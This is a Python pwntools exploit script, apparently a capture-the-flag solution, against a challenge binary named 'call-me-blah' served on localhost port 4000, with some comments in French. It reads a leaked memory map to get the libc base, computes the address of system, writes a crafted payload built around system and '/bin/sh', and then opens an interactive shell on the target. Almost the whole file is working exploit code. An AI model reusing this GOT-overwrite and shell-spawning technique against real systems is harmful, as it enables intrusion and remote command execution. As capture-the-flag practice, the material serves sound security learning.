#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./call-me-blah --host localhost --port 4000
from pwn import *
from time import sleep

# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or './call-me-blah')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executable
host = args.HOST or 'localhost'
port = int(args.PORT or 4000)

if args.LOCAL_LIBC:
    libc = exe.libc
elif args.LOCAL:
    library_path = libcdb.download_libraries('libc-2.36.so')
    if library_path:
        exe = context.binary = ELF.patch_custom_libraries(exe.path, library_path)
        libc = exe.libc
    else:
        libc = ELF('libc-2.36.so')
else:
    libc = ELF('libc-2.36.so')

def start_local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def start_remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return start_local(argv, *a, **kw)
    else:
        return start_remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:      Full RELRO
# Stack:      No canary found
# NX:         NX enabled
# PIE:        PIE enabled
# Stripped:   No

def con():
    if args.GDB:
        s = process([exe.path])
        gdb.attach(s, gdbscript=gdbscript)
        sleep(0.5)
    elif args.REMOTE:
        s = connect(host, port)
    else:
        s = process([exe.path])
    return s

s = con()

# Recevoir la réponse jusqu'à l'invite "Where:"
rep = s.recvuntil(b'Where:\n')
print(rep.decode())

# Traitement du leak pour récupérer l'adresse de puts@got et la base de la libc
puts = rep.split(b'\n')[5].split(b'-')[0]
puts = puts.decode()
puts = int(puts, 16)

base_libc = rep.split(b'\n')[7].split(b'-')[0]
base_libc = base_libc.decode()
base_libc = int(base_libc, 16)

offset_sys = 0x004c490  

system = base_libc + offset_sys

print(hex(puts))
print(hex(base_libc))
print(hex(system))

s.sendline(str(puts).encode())

rep = s.recvuntil(b'What:\n')

payload = flat(
    cyclic(16), 
    system,    
    0x0,        
    next(libc.search(b'/bin/sh')) 
)

# Envoyer le payload
s.sendline(payload)

# Passer à l'interaction
s.interactive()

